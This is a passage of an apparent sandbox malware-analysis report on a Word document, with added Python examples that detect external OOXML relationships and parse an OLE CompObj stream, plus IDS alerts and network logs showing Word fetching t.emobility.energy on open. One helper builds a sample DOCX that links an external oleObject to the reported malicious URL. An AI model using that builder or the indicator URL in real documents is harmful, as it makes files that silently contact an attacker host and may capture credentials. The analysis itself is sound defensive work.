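REL_BASE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
# URL from the report's URL table. Which relationship type carries it in the
# real sample is not stated there; oleObject is an assumption of this example.
REPORTED_URL = "https://t.emobility.energy/JpXyeF?&achiever"


def find_external_refs(docx_bytes: bytes) -> list[dict]:
    """Return every relationship whose target lies outside the package.

    OOXML marks these with TargetMode="External". A hyperlink is only followed
    when clicked; every other external type (attachedTemplate, oleObject,
    image, frame, ...) is resolved by Word as the file is opened or rendered.
    """
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{PKG_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                rel_type = rel.get("Type", "")
                target = rel.get("Target", "")
                scheme = urlparse(target).scheme.lower()
                if not scheme and target.startswith("\\\\"):
                    scheme = "unc"  # \\host\share: Word may authenticate to fetch it
                hits.append({
                    "rels_part": name,
                    "type": rel_type[len(REL_BASE):] if rel_type.startswith(REL_BASE) else rel_type,
                    "target": target,
                    "scheme": scheme,
                    "fetched_on_open": not rel_type.endswith("/hyperlink"),
                })
    return hits


def build_sample_docx() -> bytes:
    """Constructed stand-in for the analysed sample (not the real file): one
    external oleObject link to the reported URL, one embedded OLE object and,
    for contrast, one ordinary hyperlink to a placeholder address."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{PKG_NS}">'
        f'<Relationship Id="rId1" Type="{REL_BASE}oleObject" '
        f'Target="{REPORTED_URL.replace("&", "&amp;")}" TargetMode="External"/>'
        f'<Relationship Id="rId2" Type="{REL_BASE}oleObject" Target="embeddings/oleObject1.bin"/>'
        f'<Relationship Id="rId3" Type="{REL_BASE}hyperlink" '
        'Target="https://example.invalid/" TargetMode="External"/>'
        "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml",
                    '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        zf.writestr("word/_rels/document.xml.rels", rels)
        # Placeholder for the embedded compound file: CFB magic plus zero padding.
        zf.writestr("word/embeddings/oleObject1.bin",
                    b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 24)
    return buf.getvalue()


if __name__ == "__main__":
    for ref in find_external_refs(build_sample_docx()):
        when = "FETCHED ON OPEN" if ref["fetched_on_open"] else "on click only"
        print(f'{ref["rels_part"]}: {ref["type"]} -> {ref["target"]} ({when})')
```

Run against a real file with `find_external_refs(open(path, "rb").read())`; the .rels parts are plain XML inside the ZIP, so no Office installation is needed. Anything reported with `fetched_on_open` true is a network request the recipient never clicks on, and a `unc` scheme is worth treating as a credential-capture attempt as well as a fetch.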
                            General
                            Stream Path:\x1CompObj
                            CLSID:
                            File Type:data
                            Stream Size:114
                            Entropy:4.25248375192737
                            Base64 Encoded:True
                            Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
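The \x01CompObj stream is the part of an OLE object that states what is embedded. A fixed 28-byte header (with the object's CLSID in its last 16 bytes, after an 0xFFFFFFFF) is followed by three length-prefixed ANSI strings, the user-visible type name, the clipboard format and the ProgID, and optionally a Unicode block introduced by the marker 0x71B239F4. The Python below is an added example, not Joe Sandbox code, that parses exactly the 114 bytes shown in the Data Raw line above. It recovers CLSID 00020820-0000-0000-C000-000000000046, the registered class for an Excel 97-2003 worksheet, together with ProgID Excel.Sheet.8 and clipboard format Biff8, all three agreeing with the user-type string "Microsoft Office Excel 2003 Worksheet".

```python
"""Parse an OLE CompObj stream to identify the embedded object."""
import struct
import uuid

# Bytes copied from the report's "\x01CompObj" stream dump (Stream Size 114).
COMPOBJ_HEX = (
    "01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 "
    "26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 "
    "30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 "
    "45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00"
)
UNICODE_MARKER = 0x71B239F4


def _ansi_string(buf: bytes, off: int) -> tuple[str, int]:
    """LengthPrefixedAnsiString: uint32 byte length (NUL included), then the bytes."""
    (n,) = struct.unpack_from("<I", buf, off)
    off += 4
    if off + n > len(buf):
        raise ValueError("string runs past the end of the stream")
    return buf[off:off + n].rstrip(b"\x00").decode("latin-1"), off + n


def _clipboard_format(buf: bytes, off: int):
    """ClipboardFormatOrAnsiString: 0 means absent, 0xFFFFFFFF/0xFFFFFFFE means a
    4-byte standard clipboard format id follows, any other value is the byte
    length of an ANSI format name (here "Biff8")."""
    (marker,) = struct.unpack_from("<I", buf, off)
    if marker == 0:
        return None, off + 4
    if marker in (0xFFFFFFFF, 0xFFFFFFFE):
        (fmt,) = struct.unpack_from("<I", buf, off + 4)
        return fmt, off + 8
    return _ansi_string(buf, off)


def parse_compobj(buf: bytes) -> dict:
    """Return the identity fields of a CompObj stream."""
    if len(buf) < 28:
        raise ValueError("CompObj header truncated")
    reserved1, version = struct.unpack_from("<II", buf, 0)
    if reserved1 != 0xFFFE0001 or version != 0x00000A03:
        raise ValueError(f"unexpected CompObj header {reserved1:#x}/{version:#x}")
    # Bytes 8..12 are 0xFFFFFFFF; bytes 12..28 carry the object's CLSID (little-endian GUID).
    clsid = str(uuid.UUID(bytes_le=buf[12:28]))
    off = 28
    user_type, off = _ansi_string(buf, off)
    clip_fmt, off = _clipboard_format(buf, off)
    prog_id, off = _ansi_string(buf, off)
    has_unicode = (len(buf) >= off + 4
                   and struct.unpack_from("<I", buf, off)[0] == UNICODE_MARKER)
    return {
        "clsid": clsid,
        "user_type": user_type,
        "clipboard_format": clip_fmt,
        "prog_id": prog_id,
        "has_unicode_block": has_unicode,
    }


if __name__ == "__main__":
    for key, value in parse_compobj(bytes.fromhex(COMPOBJ_HEX)).items():
        print(f"{key}: {value}")
```

When triaging an embedded object, compare the three identity fields with each other and with the stream set around them: a CLSID that names a scriptable or out-of-process server while the user type claims a document, or a ProgID that disagrees with the CLSID, is the usual sign of an object that is not what it presents itself as. Here they agree, and the Workbook stream listed further down is what an Excel.Sheet.8 object is expected to carry.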
                            General
                            Stream Path:\x1Ole
                            CLSID:
                            File Type:data
                            Stream Size:20
                            Entropy:0.5689955935892812
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . . . . . . . . . . . .
                            Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            General
                            Stream Path:\x3EPRINT
                            CLSID:
                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                            Stream Size:36988
                            Entropy:3.2497681809626355
                            Base64 Encoded:False
                            Data ASCII:. . . . l . . . . . . . . . . . . . . . . . . . . . . . . . J [ . . ( W . . E M F . . . . | . . k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ K . . h C . . F . . . , . . . . . . E M F + . @ . . . . . . . . . . . . . . . . X . . . X . . . F . . . \\ . . . P . . . E M F + " @ . . . . . . . . . . . @ . . . . . . . . . . $ @ . . . . . . . . . . 0 @ . . . . . . . . . . . . ? ! @ . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                            Data Raw:01 00 00 00 6c 00 00 00 00 00 00 00 20 00 00 00 0a 14 00 00 f1 13 00 00 00 00 00 00 00 00 00 00 4a 5b 00 00 28 57 00 00 20 45 4d 46 00 00 01 00 7c 90 00 00 6b 04 00 00 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ec 13 00 00 c8 19 00 00 d8 00 00 00 17 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5c 4b 03 00 68 43 04 00 46 00 00 00 2c 00 00 00 20 00 00 00 45 4d 46 2b 01 40 01 00
                            General
                            Stream Path:\x3ObjInfo
                            CLSID:
                            File Type:data
                            Stream Size:6
                            Entropy:1.2516291673878228
                            Base64 Encoded:False
                            Data ASCII:. . . . . .
                            Data Raw:00 00 03 00 0d 00
                            General
                            Stream Path:\x5DocumentSummaryInformation
                            CLSID:
                            File Type:data
                            Stream Size:560
                            Entropy:3.3879366798911743
                            Base64 Encoded:True
                            General
                            Stream Path:\x5SummaryInformation
                            CLSID:
                            File Type:data
                            Stream Size:24184
                            Entropy:3.1945226555165376
                            Base64 Encoded:True
                            General
                            Stream Path:Workbook
                            CLSID:
                            File Type:Applesoft BASIC program data, first line number 16
                            Stream Size:17006
                            Entropy:4.28640454300865
                            Base64 Encoded:True


                            Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                            2025-03-25T12:47:44.471240+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49717 | 162.19.137.157 | 443 | TCP
                            2025-03-25T12:47:45.563705+0100 | 1810005 | Joe Security ANOMALY Microsoft Office WebDAV Discovery | 1 | 192.168.2.5 | 49718 | 162.19.137.157 | 443 | TCP
                            2025-03-25T12:47:46.006761+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49719 | 162.19.137.157 | 443 | TCP
                            • Total Packets: 38
                            • 443 (HTTPS)
                            • 53 (DNS)
                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                            Mar 25, 2025 12:47:44.094798088 CET | 49717 | 443 | 192.168.2.5 | 162.19.137.157
                            Mar 25, 2025 12:47:44.094850063 CET | 443 | 49717 | 162.19.137.157 | 192.168.2.5
                            Mar 25, 2025 12:47:44.094995975 CET | 49717 | 443 | 192.168.2.5 | 162.19.137.157
                            Mar 25, 2025 12:47:44.095429897 CET | 49717 | 443 | 192.168.2.5 | 162.19.137.157
                            Mar 25, 2025 12:47:44.095446110 CET | 443 | 49717 | 162.19.137.157 | 192.168.2.5
                            Mar 25, 2025 12:47:44.471149921 CET | 443 | 49717 | 162.19.137.157 | 192.168.2.5
                            Mar 25, 2025 12:47:44.471240044 CET | 49717 | 443 | 192.168.2.5 | 162.19.137.157
                            Mar 25, 2025 12:47:44.472852945 CET | 49717 | 443 | 192.168.2.5 | 162.19.137.157
                            Mar 25, 2025 12:47:44.472863913 CET | 443 | 49717 | 162.19.137.157 | 192.168.2.5
                            Mar 25, 2025 12:47:44.473126888 CET | 443 | 49717 | 162.19.137.157 | 192.168.2.5
                            Mar 25, 2025 12:47:44.474476099 CET | 49717 | 443 | 192.168.2.5 | 162.19.137.157
                            Mar 25, 2025 12:47:44.520265102 CET | 443 | 49717 | 162.19.137.157 | 192.168.2.5
                            Mar 25, 2025 12:47:44.828069925 CET | 443 | 49717 | 162.19.137.157 | 192.168.2.5
                            Mar 25, 2025 12:47:44.828140974 CET | 443 | 49717 | 162.19.137.157 | 192.168.2.5
                            Mar 25, 2025 12:47:44.828212023 CET | 49717 | 443 | 192.168.2.5 | 162.19.137.157
                            Mar 25, 2025 12:47:44.831005096 CET | 49717 | 443 | 192.168.2.5 | 162.19.137.157
                            Mar 25, 2025 12:47:44.831036091 CET | 443 | 49717 | 162.19.137.157 | 192.168.2.5
                            Mar 25, 2025 12:47:44.844630957 CET | 49718 | 443 | 192.168.2.5 | 162.19.137.157
                            Mar 25, 2025 12:47:44.844665051 CET | 443 | 49718 | 162.19.137.157 | 192.168.2.5
                            Mar 25, 2025 12:47:44.844788074 CET | 49718 | 443 | 192.168.2.5 | 162.19.137.157
                            Mar 25, 2025 12:47:44.845410109 CET | 49718 | 443 | 192.168.2.5 | 162.19.137.157
                            Mar 25, 2025 12:47:44.845422029 CET | 443 | 49718 | 162.19.137.157 | 192.168.2.5
                            Mar 25, 2025 12:47:45.206003904 CET | 443 | 49718 | 162.19.137.157 | 192.168.2.5
                            Mar 25, 2025 12:47:45.206094027 CET | 49718 | 443 | 192.168.2.5 | 162.19.137.157
                            Mar 25, 2025 12:47:45.216145992 CET | 49718 | 443 | 192.168.2.5 | 162.19.137.157
                            Mar 25, 2025 12:47:45.216159105 CET | 443 | 49718 | 162.19.137.157 | 192.168.2.5
                            Mar 25, 2025 12:47:45.216433048 CET | 443 | 49718 | 162.19.137.157 | 192.168.2.5
                            Mar 25, 2025 12:47:45.216497898 CET | 49718 | 443 | 192.168.2.5 | 162.19.137.157
                            Mar 25, 2025 12:47:45.217155933 CET | 49718 | 443 | 192.168.2.5 | 162.19.137.157
                            Mar 25, 2025 12:47:45.264265060 CET | 443 | 49718 | 162.19.137.157 | 192.168.2.5
                            Mar 25, 2025 12:47:45.563728094 CET | 443 | 49718 | 162.19.137.157 | 192.168.2.5
                            Mar 25, 2025 12:47:45.563801050 CET | 443 | 49718 | 162.19.137.157 | 192.168.2.5
                            Mar 25, 2025 12:47:45.563904047 CET | 49718 | 443 | 192.168.2.5 | 162.19.137.157
                            Mar 25, 2025 12:47:45.620016098 CET | 49718 | 443 | 192.168.2.5 | 162.19.137.157
                            Mar 25, 2025 12:47:45.620045900 CET | 443 | 49718 | 162.19.137.157 | 192.168.2.5
                            Mar 25, 2025 12:47:45.620057106 CET | 49718 | 443 | 192.168.2.5 | 162.19.137.157
                            Mar 25, 2025 12:47:45.620117903 CET | 49718 | 443 | 192.168.2.5 | 162.19.137.157
                            Mar 25, 2025 12:47:45.636439085 CET | 49719 | 443 | 192.168.2.5 | 162.19.137.157
                            Mar 25, 2025 12:47:45.636488914 CET | 443 | 49719 | 162.19.137.157 | 192.168.2.5
                            Mar 25, 2025 12:47:45.636801004 CET | 49719 | 443 | 192.168.2.5 | 162.19.137.157
                            Mar 25, 2025 12:47:45.637150049 CET | 49719 | 443 | 192.168.2.5 | 162.19.137.157
                            Mar 25, 2025 12:47:45.637167931 CET | 443 | 49719 | 162.19.137.157 | 192.168.2.5
                            Mar 25, 2025 12:47:46.004686117 CET | 443 | 49719 | 162.19.137.157 | 192.168.2.5
                            Mar 25, 2025 12:47:46.006761074 CET | 49719 | 443 | 192.168.2.5 | 162.19.137.157
                            Mar 25, 2025 12:47:46.006762028 CET | 49719 | 443 | 192.168.2.5 | 162.19.137.157
                            Mar 25, 2025 12:47:46.006788015 CET | 443 | 49719 | 162.19.137.157 | 192.168.2.5
                            Mar 25, 2025 12:47:46.006798983 CET | 443 | 49719 | 162.19.137.157 | 192.168.2.5
                            Mar 25, 2025 12:47:46.366946936 CET | 443 | 49719 | 162.19.137.157 | 192.168.2.5
                            Mar 25, 2025 12:47:46.367031097 CET | 443 | 49719 | 162.19.137.157 | 192.168.2.5
                            Mar 25, 2025 12:47:46.367167950 CET | 49719 | 443 | 192.168.2.5 | 162.19.137.157
                            Mar 25, 2025 12:47:46.367223024 CET | 443 | 49719 | 162.19.137.157 | 192.168.2.5
                            Mar 25, 2025 12:47:46.367240906 CET | 49719 | 443 | 192.168.2.5 | 162.19.137.157
                            Mar 25, 2025 12:47:46.367240906 CET | 49719 | 443 | 192.168.2.5 | 162.19.137.157
                            Mar 25, 2025 12:47:46.367254972 CET | 443 | 49719 | 162.19.137.157 | 192.168.2.5
                            Mar 25, 2025 12:47:46.367261887 CET | 443 | 49719 | 162.19.137.157 | 192.168.2.5
                            Mar 25, 2025 12:47:46.447187901 CET | 49721 | 443 | 192.168.2.5 | 162.19.137.157
                            Mar 25, 2025 12:47:46.447252035 CET | 443 | 49721 | 162.19.137.157 | 192.168.2.5
                            Mar 25, 2025 12:47:46.447451115 CET | 49721 | 443 | 192.168.2.5 | 162.19.137.157
                            Mar 25, 2025 12:47:46.447942019 CET | 49721 | 443 | 192.168.2.5 | 162.19.137.157
                            Mar 25, 2025 12:47:46.447961092 CET | 443 | 49721 | 162.19.137.157 | 192.168.2.5
                            Mar 25, 2025 12:47:46.810271025 CET | 443 | 49721 | 162.19.137.157 | 192.168.2.5
                            Mar 25, 2025 12:47:46.810866117 CET | 49721 | 443 | 192.168.2.5 | 162.19.137.157
                            Mar 25, 2025 12:47:46.811521053 CET | 49721 | 443 | 192.168.2.5 | 162.19.137.157
                            Mar 25, 2025 12:47:46.811532974 CET | 443 | 49721 | 162.19.137.157 | 192.168.2.5
                            Mar 25, 2025 12:47:46.813329935 CET | 49721 | 443 | 192.168.2.5 | 162.19.137.157
                            Mar 25, 2025 12:47:46.813335896 CET | 443 | 49721 | 162.19.137.157 | 192.168.2.5
                            Mar 25, 2025 12:47:47.164581060 CET | 443 | 49721 | 162.19.137.157 | 192.168.2.5
                            Mar 25, 2025 12:47:47.164670944 CET | 443 | 49721 | 162.19.137.157 | 192.168.2.5
                            Mar 25, 2025 12:47:47.164766073 CET | 49721 | 443 | 192.168.2.5 | 162.19.137.157
                            Mar 25, 2025 12:47:47.165946007 CET | 49721 | 443 | 192.168.2.5 | 162.19.137.157
                            Mar 25, 2025 12:47:47.165987968 CET | 443 | 49721 | 162.19.137.157 | 192.168.2.5
                            Mar 25, 2025 12:47:47.166008949 CET | 49721 | 443 | 192.168.2.5 | 162.19.137.157
                            Mar 25, 2025 12:47:47.166053057 CET | 49721 | 443 | 192.168.2.5 | 162.19.137.157
                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                            Mar 25, 2025 12:47:43.927630901 CET | 49817 | 53 | 192.168.2.5 | 1.1.1.1
                            Mar 25, 2025 12:47:44.093766928 CET | 53 | 49817 | 1.1.1.1 | 192.168.2.5
                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                            Mar 25, 2025 12:47:43.927630901 CET | 192.168.2.5 | 1.1.1.1 | 0xf4e1 | Standard query (0) | t.emobility.energy | A (IP address) | IN (0x0001) | false
                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                            Mar 25, 2025 12:47:41.612327099 CET | 1.1.1.1 | 192.168.2.5 | 0xa097 | No error (0) | ecs-office.s-0005.dual-s-msedge.net | s-0005.dual-s-msedge.net | - | CNAME (Canonical name) | IN (0x0001) | false
                            Mar 25, 2025 12:47:41.612327099 CET | 1.1.1.1 | 192.168.2.5 | 0xa097 | No error (0) | s-0005.dual-s-msedge.net | - | 52.123.128.14 | A (IP address) | IN (0x0001) | false
                            Mar 25, 2025 12:47:41.612327099 CET | 1.1.1.1 | 192.168.2.5 | 0xa097 | No error (0) | s-0005.dual-s-msedge.net | - | 52.123.129.14 | A (IP address) | IN (0x0001) | false
                            Mar 25, 2025 12:47:44.093766928 CET | 1.1.1.1 | 192.168.2.5 | 0xf4e1 | No error (0) | t.emobility.energy | host1.emobility.energy | - | CNAME (Canonical name) | IN (0x0001) | false
                            Mar 25, 2025 12:47:44.093766928 CET | 1.1.1.1 | 192.168.2.5 | 0xf4e1 | No error (0) | host1.emobility.energy | - | 162.19.137.157 | A (IP address) | IN (0x0001) | false
                            • t.emobility.energy
                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            0 | 192.168.2.5 | 49717 | 162.19.137.157 | 443 | 8076 | C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            Timestamp | Bytes transferred | Direction | Data
                            2025-03-25 11:47:44 UTC | 331 | OUT | OPTIONS / HTTP/1.1
                            Connection: Keep-Alive
                            Authorization: Bearer
                            User-Agent: Microsoft Office Word 2014
                            X-Office-Major-Version: 16
                            X-MS-CookieUri-Requested: t
                            X-FeatureVersion: 1
                            Accept-Auth: badger,Wlid1.1,Bearer,Basic,NTLM,Digest,Kerberos,Negotiate,Nego2
                            X-MSGETWEBURL: t
                            X-IDCRL_ACCEPTED: t
                            Host: t.emobility.energy
                            2025-03-25 11:47:44 UTC | 190 | IN | HTTP/1.1 503 Service Unavailable
                            Date: Tue, 25 Mar 2025 11:47:44 GMT
                            Server: Apache/2.4.62 (Debian)
                            Content-Length: 384
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                            2025-03-25 11:47:44 UTC | 384 | IN | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>503 Service Unavailable</title></head><body><h1>Service Unavailable</h1><p>The server is temporarily unable to service yourrequest due to maintenance downtime or capacityproblems.


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            1 | 192.168.2.5 | 49718 | 162.19.137.157 | 443 | 8076 | C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            Timestamp | Bytes transferred | Direction | Data
                            2025-03-25 11:47:45 UTC | 234 | OUT | OPTIONS / HTTP/1.1
                            Authorization: Bearer
                            X-MS-CookieUri-Requested: t
                            X-FeatureVersion: 1
                            X-IDCRL_ACCEPTED: t
                            User-Agent: Microsoft Office Protocol Discovery
                            Host: t.emobility.energy
                            Content-Length: 0
                            Connection: Keep-Alive
                            2025-03-25 11:47:45 UTC | 190 | IN | HTTP/1.1 503 Service Unavailable
                            Date: Tue, 25 Mar 2025 11:47:45 GMT
                            Server: Apache/2.4.62 (Debian)
                            Content-Length: 384
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                            2025-03-25 11:47:45 UTC | 384 | IN | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>503 Service Unavailable</title></head><body><h1>Service Unavailable</h1><p>The server is temporarily unable to service yourrequest due to maintenance downtime or capacityproblems.


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            2 | 192.168.2.5 | 49719 | 162.19.137.157 | 443 | 8076 | C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            Timestamp | Bytes transferred | Direction | Data
                            2025-03-25 11:47:46 UTC | 326 | OUT | HEAD /JpXyeF?&achiever HTTP/1.1
                            Connection: Keep-Alive
                            Authorization: Bearer
                            User-Agent: Microsoft Office Word 2014
                            X-Office-Major-Version: 16
                            X-MS-CookieUri-Requested: t
                            X-FeatureVersion: 1
                            Accept-Auth: badger,Wlid1.1,Bearer,Basic,NTLM,Digest,Kerberos,Negotiate,Nego2
                            X-IDCRL_ACCEPTED: t
                            Host: t.emobility.energy
                            2025-03-25 11:47:46 UTC | 169 | IN | HTTP/1.1 503 Service Unavailable
                            Date: Tue, 25 Mar 2025 11:47:46 GMT
                            Server: Apache/2.4.62 (Debian)
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            3 | 192.168.2.5 | 49721 | 162.19.137.157 | 443 | 8076 | C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            Timestamp | Bytes transferred | Direction | Data
                            2025-03-25 11:47:46 UTC | 191 | OUT | GET /JpXyeF?&achiever HTTP/1.1
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)
                            Accept-Encoding: gzip, deflate
                            Host: t.emobility.energy
                            Connection: Keep-Alive
                            2025-03-25 11:47:47 UTC | 190 | IN | HTTP/1.1 503 Service Unavailable
                            Date: Tue, 25 Mar 2025 11:47:47 GMT
                            Server: Apache/2.4.62 (Debian)
                            Content-Length: 384
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                            2025-03-25 11:47:47 UTC | 384 | IN | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>503 Service Unavailable</title></head><body><h1>Service Unavailable</h1><p>The server is temporarily unable to service yourrequest due to maintenance downtime or capacityproblems.



                            Target ID:0
                            Start time:07:47:36
                            Start date:25/03/2025
                            Path:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            Wow64 process (32bit):true
                            Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
                            Imagebase:0x20000
                            File size:1'620'872 bytes
                            MD5 hash:1A0C2C2E7D9C4BC18E91604E9B0C7678
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            No disassembly